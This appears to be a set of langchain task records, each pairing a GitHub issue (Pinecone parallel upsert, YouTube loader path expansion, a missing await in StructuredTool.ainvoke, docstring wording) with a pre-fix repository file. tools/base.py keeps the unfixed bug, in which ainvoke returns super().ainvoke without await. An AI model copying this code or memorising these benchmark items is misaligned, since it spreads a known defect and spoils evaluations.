            ids=ids,
            embedding=embedding_openai,
            index_name=index_name,
            namespace=index_name,
        )
        index_stats = self.index.describe_index_stats()
        assert index_stats["namespaces"][index_name]["vector_count"] == len(texts)

        ids_1 = [uuid.uuid4().hex for _ in range(len(texts))]
        Pinecone.from_texts(
            texts=texts,
            ids=ids_1,
            embedding=embedding_openai,
            index_name=index_name,
            namespace=index_name,
        )
        index_stats = self.index.describe_index_stats()
        assert index_stats["namespaces"][index_name]["vector_count"] == len(texts) * 2
        assert index_stats["total_vector_count"] == len(texts) * 2

    @pytest.mark.vcr()
    def test_relevance_score_bound(self, embedding_openai: OpenAIEmbeddings) -> None:
        """Ensures all relevance scores are between 0 and 1."""
        texts = ["foo", "bar", "baz"]
        metadatas = [{"page": i} for i in range(len(texts))]
        docsearch = Pinecone.from_texts(
            texts,
            embedding_openai,
            index_name=index_name,
            metadatas=metadatas,
        )
        # wait for the index to be ready
        time.sleep(20)
        output = docsearch.similarity_search_with_relevance_scores("foo", k=3)
        assert all(
            (1 >= score or np.isclose(score, 1)) and score >= 0 for _, score in output
        )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,855
Support index upsert parallelization for pinecone
### Feature request We can take advantage of pinecone's parallel upsert (see example: https://docs.pinecone.io/docs/insert-data#sending-upserts-in-parallel). This will require modification of the current `from_texts` pipeline to 1. Create a batch (chunk) for doing embeddings (i.e. have a chunk size of 1000 for embeddings) 2. Perform a parallel upsert to the Pinecone index on that chunk This way we are in control of 3 things: 1. Thread pool for the pinecone index 2. Parametrize the batch size for embeddings (i.e. it helps to avoid the rate limit for OpenAI embeddings) 3. Parametrize the batch size for upsert (it helps to avoid throttling of the pinecone API) As a part of this ticket, we can consolidate the code between `add_texts` and `from_texts`, as they are doing a similar thing. ### Motivation The functions `from_texts` and `add_texts` for index upsert don't take advantage of parallelism, especially when embeddings are calculated by HTTP calls (i.e. OpenAI embeddings). This makes the whole sequence inefficient from an IO-bound standpoint, as the pipeline is the following: 1. Take a small batch, i.e. 32/64, of documents 2. Calculate embeddings --> WAIT 3. Upsert a batch --> WAIT We can benefit from either parallel upsert or we can utilize `asyncio`. ### Your contribution I will do it.
https://github.com/langchain-ai/langchain/issues/9855
https://github.com/langchain-ai/langchain/pull/9859
16a27ab244e6b92d74c48c206e0e6f1b5d00e126
4765c097035b9ff722fa9bbb7c3dd4eb6aed933c
"2023-08-28T13:09:29Z"
python
"2023-09-03T22:37:41Z"
pyproject.toml
[tool.poetry] name = "langchain-monorepo" version = "0.0.1" description = "LangChain mono-repo" authors = [] license = "MIT" readme = "README.md" repository = "https://www.github.com/langchain-ai/langchain" [tool.poetry.dependencies] python = ">=3.8.1,<4.0" [tool.poetry.group.docs.dependencies] langchain = { path = "libs/langchain/", develop = true } autodoc_pydantic = "^1.8.0" myst_parser = "^0.18.1" nbsphinx = "^0.8.9" sphinx = "^4.5.0" sphinx-autobuild = "^2021.3.14" sphinx_book_theme = "^0.3.3" sphinx_rtd_theme = "^1.0.0" sphinx-typlog-theme = "^0.8.0" sphinx-panels = "^0.6.0" toml = "^0.10.2" myst-nb = "^0.17.1" linkchecker = "^10.2.1" sphinx-copybutton = "^0.5.1" nbdoc = "^0.0.82" [tool.poetry.group.codespell.dependencies] codespell = "^2.2.0" [tool.codespell] skip = '.git,*.pdf,*.svg,*.pdf,*.yaml,*.ipynb,poetry.lock,*.min.js,*.css,package-lock.json,example_data,_dist,examples' # Ignore latin etc ignore-regex = '.*(Stati Uniti|Tense=Pres).*' # whats is a typo but used frequently in queries so kept as is # aapply - async apply # unsecure - typo but part of API, decided to not bother for now ignore-words-list = 'momento,collison,ned,foor,reworkd,parth,whats,aapply,mysogyny,unsecure,damon,crate'
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,019
fix: Loading documents from a YouTube URL
### System Info MacOS M2 13.4.1 (22F82) ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce the behaviour: 1. Run the [tutorial](https://python.langchain.com/docs/integrations/document_loaders/youtube_audio) with the default parameter `save_dir = "~/Downloads/YouTube"` 2. After calling `docs = loader.load()`, the docs will be empty. I have implemented a dummy fix for the interim. The error is in the `YoutubeAudioLoader.yield_blobs` method (from langchain.document_loaders.blob_loaders.youtube_audio import YoutubeAudioLoader): ``` # This doesn't always work (macOS) loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a") ``` The reason it doesn't work is that the glob runs against the literal path ~/Downloads/YouTube, since `~` is not expanded. The fix I propose is either: - Use the FULL file path for `save_dir` in the tutorial, or - Replace the problematic line with the following, so that it finds the actual directory even when file paths are specified with `~`: ``` loader = FileSystemBlobLoader(os.path.expanduser(self.save_dir), glob="*.m4a") ``` ### Expected behavior There should be documents in the `loader.load()` result. ### My Fix ``` # Yield the written blobs """ you could fix save_dir like this... (old) save_dir = "~/Downloads/YouTube" (new) "/Users/shawnesquivel/Downloads/YouTube" """ # This doesn't always work (macOS) loader = FileSystemBlobLoader(self.save_dir, glob="*.m4a") # This works loader = FileSystemBlobLoader(os.path.expanduser(self.save_dir), glob="*.m4a") ``` A condensed runnable version of this fix follows below.
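Condensing the reporter's fix into one runnable snippet (the path is illustrative):

```python
import os

from langchain.document_loaders.blob_loaders import FileSystemBlobLoader

save_dir = "~/Downloads/YouTube"  # "~" is not expanded by pathlib's glob
# os.path.expanduser turns "~" into the real home directory, so the glob
# actually finds the downloaded .m4a files
loader = FileSystemBlobLoader(os.path.expanduser(save_dir), glob="*.m4a")
for blob in loader.yield_blobs():
    print(blob)
```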
https://github.com/langchain-ai/langchain/issues/10019
https://github.com/langchain-ai/langchain/pull/10133
31bbe807583b4a53c9fd2fa98d8b4d1fe185ba40
e0f6ba08d6ad86226552d906e397a6a21f1904d0
"2023-08-31T03:19:25Z"
python
"2023-09-04T07:21:33Z"
libs/langchain/langchain/document_loaders/blob_loaders/file_system.py
"""Use to load blobs from the local file system.""" from pathlib import Path from typing import Callable, Iterable, Iterator, Optional, Sequence, TypeVar, Union from langchain.document_loaders.blob_loaders.schema import Blob, BlobLoader T = TypeVar("T") def _make_iterator( length_func: Callable[[], int], show_progress: bool = False ) -> Callable[[Iterable[T]], Iterator[T]]: """Create a function that optionally wraps an iterable in tqdm.""" if show_progress: try: from tqdm.auto import tqdm except ImportError: raise ImportError( "You must install tqdm to use show_progress=True." "You can install tqdm with `pip install tqdm`." ) # Make sure to provide `total` here so that tqdm can show # a progress bar that takes into account the total number of files. def _with_tqdm(iterable: Iterable[T]) -> Iterator[T]: """Wrap an iterable in a tqdm progress bar.""" return tqdm(iterable, total=length_func()) iterator = _with_tqdm else: iterator = iter # type: ignore return iterator # PUBLIC API class FileSystemBlobLoader(BlobLoader): """Load blobs in the local file system. Example: .. code-block:: python from langchain.document_loaders.blob_loaders import FileSystemBlobLoader loader = FileSystemBlobLoader("/path/to/directory") for blob in loader.yield_blobs(): print(blob) """ def __init__( self, path: Union[str, Path], *, glob: str = "**/[!.]*", exclude: Sequence[str] = (), suffixes: Optional[Sequence[str]] = None, show_progress: bool = False, ) -> None: """Initialize with a path to directory and how to glob over it. Args: path: Path to directory to load from glob: Glob pattern relative to the specified path by default set to pick up all non-hidden files exclude: patterns to exclude from results, use glob syntax suffixes: Provide to keep only files with these suffixes Useful when wanting to keep files with different suffixes Suffixes must include the dot, e.g. ".txt" show_progress: If true, will show a progress bar as the files are loaded. This forces an iteration through all matching files to count them prior to loading them. Examples: .. code-block:: python # Recursively load all text files in a directory. loader = FileSystemBlobLoader("/path/to/directory", glob="**/*.txt") # Recursively load all non-hidden files in a directory. loader = FileSystemBlobLoader("/path/to/directory", glob="**/[!.]*") # Load all files in a directory without recursion. loader = FileSystemBlobLoader("/path/to/directory", glob="*") # Recursively load all files in a directory, except for py or pyc files. 
loader = FileSystemBlobLoader( "/path/to/directory", glob="**/*.txt", exclude=["**/*.py", "**/*.pyc"] ) """ if isinstance(path, Path): _path = path elif isinstance(path, str): _path = Path(path) else: raise TypeError(f"Expected str or Path, got {type(path)}") self.path = _path self.glob = glob self.suffixes = set(suffixes or []) self.show_progress = show_progress self.exclude = exclude def yield_blobs( self, ) -> Iterable[Blob]: """Yield blobs that match the requested pattern.""" iterator = _make_iterator( length_func=self.count_matching_files, show_progress=self.show_progress ) for path in iterator(self._yield_paths()): yield Blob.from_path(path) def _yield_paths(self) -> Iterable[Path]: """Yield paths that match the requested pattern.""" paths = self.path.glob(self.glob) for path in paths: if self.exclude: if any(path.match(glob) for glob in self.exclude): continue if path.is_file(): if self.suffixes and path.suffix not in self.suffixes: continue yield path def count_matching_files(self) -> int: """Count files that match the pattern without loading them.""" # Carry out a full iteration to count the files without # materializing anything expensive in memory. num = 0 for _ in self._yield_paths(): num += 1 return num
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,080
StructuredTool ainvoke doesn't await parent class ainvoke
[code pointer](https://github.com/langchain-ai/langchain/blob/74fcfed4e2bdd186c2869a07008175a9b66b1ed4/libs/langchain/langchain/tools/base.py#L588C16-L588C16) In `langchain.tools.base`, change ```python class StructuredTool(BaseTool): """Tool that can operate on any number of inputs.""" description: str = "" args_schema: Type[BaseModel] = Field(..., description="The tool schema.") """The input arguments' schema.""" func: Optional[Callable[..., Any]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[Any]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return super().ainvoke(input, config, **kwargs) ``` to ```python class StructuredTool(BaseTool): """Tool that can operate on any number of inputs.""" description: str = "" args_schema: Type[BaseModel] = Field(..., description="The tool schema.") """The input arguments' schema.""" func: Optional[Callable[..., Any]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[Any]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return await super().ainvoke(input, config, **kwargs) ```
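A small script that surfaces the symptom; the `multiply` tool is a made-up example. With the missing `await`, awaiting `ainvoke` hands back the still-unawaited inner coroutine instead of the result:

```python
import asyncio

from langchain.tools import StructuredTool


async def multiply(a: int, b: int) -> int:
    """Multiply two numbers."""
    return a * b


tool = StructuredTool.from_function(coroutine=multiply)


async def main() -> None:
    result = await tool.ainvoke({"a": 2, "b": 3})
    # Buggy version: prints a coroutine object rather than 6
    print(result)


asyncio.run(main())
```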
https://github.com/langchain-ai/langchain/issues/10080
https://github.com/langchain-ai/langchain/pull/10300
fdba711d28375e86b23cfbad10a17feb67276ef5
28de8d132c8c4f7ecfe246c61375d91a04ff0abf
"2023-09-01T07:36:50Z"
python
"2023-09-08T02:54:53Z"
libs/langchain/langchain/tools/base.py
"""Base implementation for tools or skills.""" from __future__ import annotations import asyncio import inspect import warnings from abc import abstractmethod from functools import partial from inspect import signature from typing import Any, Awaitable, Callable, Dict, List, Optional, Tuple, Type, Union from langchain.callbacks.base import BaseCallbackManager from langchain.callbacks.manager import ( AsyncCallbackManager, AsyncCallbackManagerForToolRun, CallbackManager, CallbackManagerForToolRun, Callbacks, ) from langchain.pydantic_v1 import ( BaseModel, Extra, Field, create_model, root_validator, validate_arguments, ) from langchain.schema.runnable import Runnable, RunnableConfig class SchemaAnnotationError(TypeError): """Raised when 'args_schema' is missing or has an incorrect type annotation.""" def _create_subset_model( name: str, model: BaseModel, field_names: list ) -> Type[BaseModel]: """Create a pydantic model with only a subset of model's fields.""" fields = {} for field_name in field_names: field = model.__fields__[field_name] fields[field_name] = (field.outer_type_, field.field_info) return create_model(name, **fields) # type: ignore def _get_filtered_args( inferred_model: Type[BaseModel], func: Callable, ) -> dict: """Get the arguments from a function's signature.""" schema = inferred_model.schema()["properties"] valid_keys = signature(func).parameters return {k: schema[k] for k in valid_keys if k not in ("run_manager", "callbacks")} class _SchemaConfig: """Configuration for the pydantic model.""" extra: Any = Extra.forbid arbitrary_types_allowed: bool = True def create_schema_from_function( model_name: str, func: Callable, ) -> Type[BaseModel]: """Create a pydantic schema from a function's signature. Args: model_name: Name to assign to the generated pydandic schema func: Function to generate the schema from Returns: A pydantic model with the same arguments as the function """ # https://docs.pydantic.dev/latest/usage/validation_decorator/ validated = validate_arguments(func, config=_SchemaConfig) # type: ignore inferred_model = validated.model # type: ignore if "run_manager" in inferred_model.__fields__: del inferred_model.__fields__["run_manager"] if "callbacks" in inferred_model.__fields__: del inferred_model.__fields__["callbacks"] # Pydantic adds placeholder virtual fields we need to strip valid_properties = _get_filtered_args(inferred_model, func) return _create_subset_model( f"{model_name}Schema", inferred_model, list(valid_properties) ) class ToolException(Exception): """An optional exception that tool throws when execution error occurs. When this exception is thrown, the agent will not stop working, but will handle the exception according to the handle_tool_error variable of the tool, and the processing result will be returned to the agent as observation, and printed in red on the console. """ pass class BaseTool(BaseModel, Runnable[Union[str, Dict], Any]): """Interface LangChain tools must implement.""" def __init_subclass__(cls, **kwargs: Any) -> None: """Create the definition of the new tool class.""" super().__init_subclass__(**kwargs) args_schema_type = cls.__annotations__.get("args_schema", None) if args_schema_type is not None: if args_schema_type is None or args_schema_type == BaseModel: # Throw errors for common mis-annotations. # TODO: Use get_args / get_origin and fully # specify valid annotations. typehint_mandate = """ class ChildTool(BaseTool): ... 
args_schema: Type[BaseModel] = SchemaClass ...""" name = cls.__name__ raise SchemaAnnotationError( f"Tool definition for {name} must include valid type annotations" f" for argument 'args_schema' to behave as expected.\n" f"Expected annotation of 'Type[BaseModel]'" f" but got '{args_schema_type}'.\n" f"Expected class looks like:\n" f"{typehint_mandate}" ) name: str """The unique name of the tool that clearly communicates its purpose.""" description: str """Used to tell the model how/when/why to use the tool. You can provide few-shot examples as a part of the description. """ args_schema: Optional[Type[BaseModel]] = None """Pydantic model class to validate and parse the tool's input arguments.""" return_direct: bool = False """Whether to return the tool's output directly. Setting this to True means that after the tool is called, the AgentExecutor will stop looping. """ verbose: bool = False """Whether to log the tool's progress.""" callbacks: Callbacks = Field(default=None, exclude=True) """Callbacks to be called during tool execution.""" callback_manager: Optional[BaseCallbackManager] = Field(default=None, exclude=True) """Deprecated. Please use callbacks instead.""" tags: Optional[List[str]] = None """Optional list of tags associated with the tool. Defaults to None These tags will be associated with each call to this tool, and passed as arguments to the handlers defined in `callbacks`. You can use these to eg identify a specific instance of a tool with its use case. """ metadata: Optional[Dict[str, Any]] = None """Optional metadata associated with the tool. Defaults to None This metadata will be associated with each call to this tool, and passed as arguments to the handlers defined in `callbacks`. You can use these to eg identify a specific instance of a tool with its use case. 
""" handle_tool_error: Optional[ Union[bool, str, Callable[[ToolException], str]] ] = False """Handle the content of the ToolException thrown.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def is_single_input(self) -> bool: """Whether the tool only accepts a single input.""" keys = {k for k in self.args if k != "kwargs"} return len(keys) == 1 @property def args(self) -> dict: if self.args_schema is not None: return self.args_schema.schema()["properties"] else: schema = create_schema_from_function(self.name, self._run) return schema.schema()["properties"] # --- Runnable --- def invoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: config = config or {} return self.run( input, callbacks=config.get("callbacks"), tags=config.get("tags"), metadata=config.get("metadata"), **kwargs, ) async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if type(self)._arun == BaseTool._arun: # If the tool does not implement async, fall back to default implementation return super().ainvoke(input, config, **kwargs) config = config or {} return await self.arun( input, callbacks=config.get("callbacks"), tags=config.get("tags"), metadata=config.get("metadata"), **kwargs, ) # --- Tool --- def _parse_input( self, tool_input: Union[str, Dict], ) -> Union[str, Dict[str, Any]]: """Convert tool input to pydantic model.""" input_args = self.args_schema if isinstance(tool_input, str): if input_args is not None: key_ = next(iter(input_args.__fields__.keys())) input_args.validate({key_: tool_input}) return tool_input else: if input_args is not None: result = input_args.parse_obj(tool_input) return {k: v for k, v in result.dict().items() if k in tool_input} return tool_input @root_validator() def raise_deprecation(cls, values: Dict) -> Dict: """Raise deprecation warning if callback_manager is used.""" if values.get("callback_manager") is not None: warnings.warn( "callback_manager is deprecated. Please use callbacks instead.", DeprecationWarning, ) values["callbacks"] = values.pop("callback_manager", None) return values @abstractmethod def _run( self, *args: Any, **kwargs: Any, ) -> Any: """Use the tool. Add run_manager: Optional[CallbackManagerForToolRun] = None to child implementations to enable tracing, """ async def _arun( self, *args: Any, **kwargs: Any, ) -> Any: """Use the tool asynchronously. Add run_manager: Optional[AsyncCallbackManagerForToolRun] = None to child implementations to enable tracing, """ return await asyncio.get_running_loop().run_in_executor( None, partial(self._run, **kwargs), *args, ) def _to_args_and_kwargs(self, tool_input: Union[str, Dict]) -> Tuple[Tuple, Dict]: # For backwards compatibility, if run_input is a string, # pass as a positional argument. 
if isinstance(tool_input, str): return (tool_input,), {} else: return (), tool_input def run( self, tool_input: Union[str, Dict], verbose: Optional[bool] = None, start_color: Optional[str] = "green", color: Optional[str] = "green", callbacks: Callbacks = None, *, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run the tool.""" parsed_input = self._parse_input(tool_input) if not self.verbose and verbose is not None: verbose_ = verbose else: verbose_ = self.verbose callback_manager = CallbackManager.configure( callbacks, self.callbacks, verbose_, tags, self.tags, metadata, self.metadata, ) # TODO: maybe also pass through run_manager is _run supports kwargs new_arg_supported = signature(self._run).parameters.get("run_manager") run_manager = callback_manager.on_tool_start( {"name": self.name, "description": self.description}, tool_input if isinstance(tool_input, str) else str(tool_input), color=start_color, **kwargs, ) try: tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input) observation = ( self._run(*tool_args, run_manager=run_manager, **tool_kwargs) if new_arg_supported else self._run(*tool_args, **tool_kwargs) ) except ToolException as e: if not self.handle_tool_error: run_manager.on_tool_error(e) raise e elif isinstance(self.handle_tool_error, bool): if e.args: observation = e.args[0] else: observation = "Tool execution error" elif isinstance(self.handle_tool_error, str): observation = self.handle_tool_error elif callable(self.handle_tool_error): observation = self.handle_tool_error(e) else: raise ValueError( f"Got unexpected type of `handle_tool_error`. Expected bool, str " f"or callable. Received: {self.handle_tool_error}" ) run_manager.on_tool_end( str(observation), color="red", name=self.name, **kwargs ) return observation except (Exception, KeyboardInterrupt) as e: run_manager.on_tool_error(e) raise e else: run_manager.on_tool_end( str(observation), color=color, name=self.name, **kwargs ) return observation async def arun( self, tool_input: Union[str, Dict], verbose: Optional[bool] = None, start_color: Optional[str] = "green", color: Optional[str] = "green", callbacks: Callbacks = None, *, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, **kwargs: Any, ) -> Any: """Run the tool asynchronously.""" parsed_input = self._parse_input(tool_input) if not self.verbose and verbose is not None: verbose_ = verbose else: verbose_ = self.verbose callback_manager = AsyncCallbackManager.configure( callbacks, self.callbacks, verbose_, tags, self.tags, metadata, self.metadata, ) new_arg_supported = signature(self._arun).parameters.get("run_manager") run_manager = await callback_manager.on_tool_start( {"name": self.name, "description": self.description}, tool_input if isinstance(tool_input, str) else str(tool_input), color=start_color, **kwargs, ) try: # We then call the tool on the tool input to get an observation tool_args, tool_kwargs = self._to_args_and_kwargs(parsed_input) observation = ( await self._arun(*tool_args, run_manager=run_manager, **tool_kwargs) if new_arg_supported else await self._arun(*tool_args, **tool_kwargs) ) except ToolException as e: if not self.handle_tool_error: await run_manager.on_tool_error(e) raise e elif isinstance(self.handle_tool_error, bool): if e.args: observation = e.args[0] else: observation = "Tool execution error" elif isinstance(self.handle_tool_error, str): observation = self.handle_tool_error elif callable(self.handle_tool_error): observation = 
self.handle_tool_error(e) else: raise ValueError( f"Got unexpected type of `handle_tool_error`. Expected bool, str " f"or callable. Received: {self.handle_tool_error}" ) await run_manager.on_tool_end( str(observation), color="red", name=self.name, **kwargs ) return observation except (Exception, KeyboardInterrupt) as e: await run_manager.on_tool_error(e) raise e else: await run_manager.on_tool_end( str(observation), color=color, name=self.name, **kwargs ) return observation def __call__(self, tool_input: str, callbacks: Callbacks = None) -> str: """Make tool callable.""" return self.run(tool_input, callbacks=callbacks) class Tool(BaseTool): """Tool that takes in function or coroutine directly.""" description: str = "" func: Optional[Callable[..., str]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[str]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return super().ainvoke(input, config, **kwargs) # --- Tool --- @property def args(self) -> dict: """The tool's input arguments.""" if self.args_schema is not None: return self.args_schema.schema()["properties"] # For backwards compatibility, if the function signature is ambiguous, # assume it takes a single string input. return {"tool_input": {"type": "string"}} def _to_args_and_kwargs(self, tool_input: Union[str, Dict]) -> Tuple[Tuple, Dict]: """Convert tool input to pydantic model.""" args, kwargs = super()._to_args_and_kwargs(tool_input) # For backwards compatibility. The tool must be run with a single input all_args = list(args) + list(kwargs.values()) if len(all_args) != 1: raise ToolException( f"Too many arguments to single-input tool {self.name}." 
f" Args: {all_args}" ) return tuple(all_args), {} def _run( self, *args: Any, run_manager: Optional[CallbackManagerForToolRun] = None, **kwargs: Any, ) -> Any: """Use the tool.""" if self.func: new_argument_supported = signature(self.func).parameters.get("callbacks") return ( self.func( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else self.func(*args, **kwargs) ) raise NotImplementedError("Tool does not support sync") async def _arun( self, *args: Any, run_manager: Optional[AsyncCallbackManagerForToolRun] = None, **kwargs: Any, ) -> Any: """Use the tool asynchronously.""" if self.coroutine: new_argument_supported = signature(self.coroutine).parameters.get( "callbacks" ) return ( await self.coroutine( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else await self.coroutine(*args, **kwargs) ) else: return await asyncio.get_running_loop().run_in_executor( None, partial(self._run, run_manager=run_manager, **kwargs), *args ) # TODO: this is for backwards compatibility, remove in future def __init__( self, name: str, func: Optional[Callable], description: str, **kwargs: Any ) -> None: """Initialize tool.""" super(Tool, self).__init__( name=name, func=func, description=description, **kwargs ) @classmethod def from_function( cls, func: Optional[Callable], name: str, # We keep these required to support backwards compatibility description: str, return_direct: bool = False, args_schema: Optional[Type[BaseModel]] = None, coroutine: Optional[ Callable[..., Awaitable[Any]] ] = None, # This is last for compatibility, but should be after func **kwargs: Any, ) -> Tool: """Initialize tool from a function.""" if func is None and coroutine is None: raise ValueError("Function and/or coroutine must be provided") return cls( name=name, func=func, coroutine=coroutine, description=description, return_direct=return_direct, args_schema=args_schema, **kwargs, ) class StructuredTool(BaseTool): """Tool that can operate on any number of inputs.""" description: str = "" args_schema: Type[BaseModel] = Field(..., description="The tool schema.") """The input arguments' schema.""" func: Optional[Callable[..., Any]] """The function to run when the tool is called.""" coroutine: Optional[Callable[..., Awaitable[Any]]] = None """The asynchronous version of the function.""" # --- Runnable --- async def ainvoke( self, input: Union[str, Dict], config: Optional[RunnableConfig] = None, **kwargs: Any, ) -> Any: if not self.coroutine: # If the tool does not implement async, fall back to default implementation return await asyncio.get_running_loop().run_in_executor( None, partial(self.invoke, input, config, **kwargs) ) return super().ainvoke(input, config, **kwargs) # --- Tool --- @property def args(self) -> dict: """The tool's input arguments.""" return self.args_schema.schema()["properties"] def _run( self, *args: Any, run_manager: Optional[CallbackManagerForToolRun] = None, **kwargs: Any, ) -> Any: """Use the tool.""" if self.func: new_argument_supported = signature(self.func).parameters.get("callbacks") return ( self.func( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else self.func(*args, **kwargs) ) raise NotImplementedError("Tool does not support sync") async def _arun( self, *args: Any, run_manager: Optional[AsyncCallbackManagerForToolRun] = None, **kwargs: Any, ) -> str: """Use the tool asynchronously.""" if self.coroutine: new_argument_supported = 
signature(self.coroutine).parameters.get( "callbacks" ) return ( await self.coroutine( *args, callbacks=run_manager.get_child() if run_manager else None, **kwargs, ) if new_argument_supported else await self.coroutine(*args, **kwargs) ) return await asyncio.get_running_loop().run_in_executor( None, partial(self._run, run_manager=run_manager, **kwargs), *args, ) @classmethod def from_function( cls, func: Optional[Callable] = None, coroutine: Optional[Callable[..., Awaitable[Any]]] = None, name: Optional[str] = None, description: Optional[str] = None, return_direct: bool = False, args_schema: Optional[Type[BaseModel]] = None, infer_schema: bool = True, **kwargs: Any, ) -> StructuredTool: """Create tool from a given function. A classmethod that helps to create a tool from a function. Args: func: The function from which to create a tool coroutine: The async function from which to create a tool name: The name of the tool. Defaults to the function name description: The description of the tool. Defaults to the function docstring return_direct: Whether to return the result directly or as a callback args_schema: The schema of the tool's input arguments infer_schema: Whether to infer the schema from the function's signature **kwargs: Additional arguments to pass to the tool Returns: The tool Examples: .. code-block:: python def add(a: int, b: int) -> int: \"\"\"Add two numbers\"\"\" return a + b tool = StructuredTool.from_function(add) tool.run(1, 2) # 3 """ if func is not None: source_function = func elif coroutine is not None: source_function = coroutine else: raise ValueError("Function and/or coroutine must be provided") name = name or source_function.__name__ description = description or source_function.__doc__ if description is None: raise ValueError( "Function must have a docstring if description not provided." ) # Description example: # search_api(query: str) - Searches the API for the query. sig = signature(source_function) description = f"{name}{sig} - {description.strip()}" _args_schema = args_schema if _args_schema is None and infer_schema: _args_schema = create_schema_from_function(f"{name}Schema", source_function) return cls( name=name, func=func, coroutine=coroutine, args_schema=_args_schema, description=description, return_direct=return_direct, **kwargs, ) def tool( *args: Union[str, Callable], return_direct: bool = False, args_schema: Optional[Type[BaseModel]] = None, infer_schema: bool = True, ) -> Callable: """Make tools out of functions, can be used with or without arguments. Args: *args: The arguments to the tool. return_direct: Whether to return directly from the tool rather than continuing the agent loop. args_schema: optional argument schema for user to specify infer_schema: Whether to infer the schema of the arguments from the function's signature. This also makes the resultant tool accept a dictionary input to its `run()` function. Requires: - Function must be of type (str) -> str - Function must have a docstring Examples: .. code-block:: python @tool def search_api(query: str) -> str: # Searches the API for the query. return @tool("search", return_direct=True) def search_api(query: str) -> str: # Searches the API for the query.
return """ def _make_with_name(tool_name: str) -> Callable: def _make_tool(dec_func: Callable) -> BaseTool: if inspect.iscoroutinefunction(dec_func): coroutine = dec_func func = None else: coroutine = None func = dec_func if infer_schema or args_schema is not None: return StructuredTool.from_function( func, coroutine, name=tool_name, return_direct=return_direct, args_schema=args_schema, infer_schema=infer_schema, ) # If someone doesn't want a schema applied, we must treat it as # a simple string->string function if func.__doc__ is None: raise ValueError( "Function must have a docstring if " "description not provided and infer_schema is False." ) return Tool( name=tool_name, func=func, description=f"{tool_name} tool", return_direct=return_direct, coroutine=coroutine, ) return _make_tool if len(args) == 1 and isinstance(args[0], str): # if the argument is a string, then we use the string as the tool name # Example usage: @tool("search", return_direct=True) return _make_with_name(args[0]) elif len(args) == 1 and callable(args[0]): # if the argument is a function, then we use the function name as the tool name # Example usage: @tool return _make_with_name(args[0].__name__)(args[0]) elif len(args) == 0: # if there are no arguments, then we use the function name as the tool name # Example usage: @tool(return_direct=True) def _partial(func: Callable[[str], str]) -> BaseTool: return _make_with_name(func.__name__)(func) return _partial else: raise ValueError("Too many arguments for tool decorator")
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,378
DOC: Incorrect and confusing documentation of AIMessagePromptTemplate and HumanMessagePromptTemplate
### Issue with current documentation: [AIMessagePromptTemplate documentation](https://api.python.langchain.com/en/latest/prompts/langchain.prompts.chat.AIMessagePromptTemplate.html#langchain-prompts-chat-aimessageprompttemplate) incorrectly and confusingly describes the message as "... This is a message that is not sent to the user." [HumanMessagePromptTemplate documentation](https://api.python.langchain.com/en/latest/prompts/langchain.prompts.chat.HumanMessagePromptTemplate.html#langchain-prompts-chat-humanmessageprompttemplate) incorrectly and confusingly describes the message as "... This is a message that is sent to the user." Compare to the documentation for [AIMessage](https://api.python.langchain.com/en/latest/schema/langchain.schema.messages.AIMessage.html#langchain-schema-messages-aimessage) and [HumanMessage](https://api.python.langchain.com/en/latest/schema/langchain.schema.messages.HumanMessage.html#langchain-schema-messages-humanmessage), which correctly and clearly describe each message as "A message from an AI" and "A message from a human." respectively. ### Idea or request for content: AIMessagePromptTemplate should be described as "AI message prompt template. This is a message that is sent to the user from the AI." HumanMessagePromptTemplate should be described as "Human message prompt template. This is a message that is sent from the user to the AI." These are clear, concise and consistent with documentation of the message schema. I will submit a PR with revised docstrings for each class. This should, then, be reflected in the API reference documentation upon next build.
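For reference, a sketch of the revised docstrings proposed above (class bodies elided; the wording follows this issue's suggestion, not necessarily the merged PR):

```python
class HumanMessagePromptTemplate(BaseStringMessagePromptTemplate):
    """Human message prompt template.

    This is a message that is sent from the user to the AI.
    """


class AIMessagePromptTemplate(BaseStringMessagePromptTemplate):
    """AI message prompt template.

    This is a message that is sent to the user from the AI.
    """
```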
https://github.com/langchain-ai/langchain/issues/10378
https://github.com/langchain-ai/langchain/pull/10379
8c0f391815eac61f2b5d1b993e9bc4795808696f
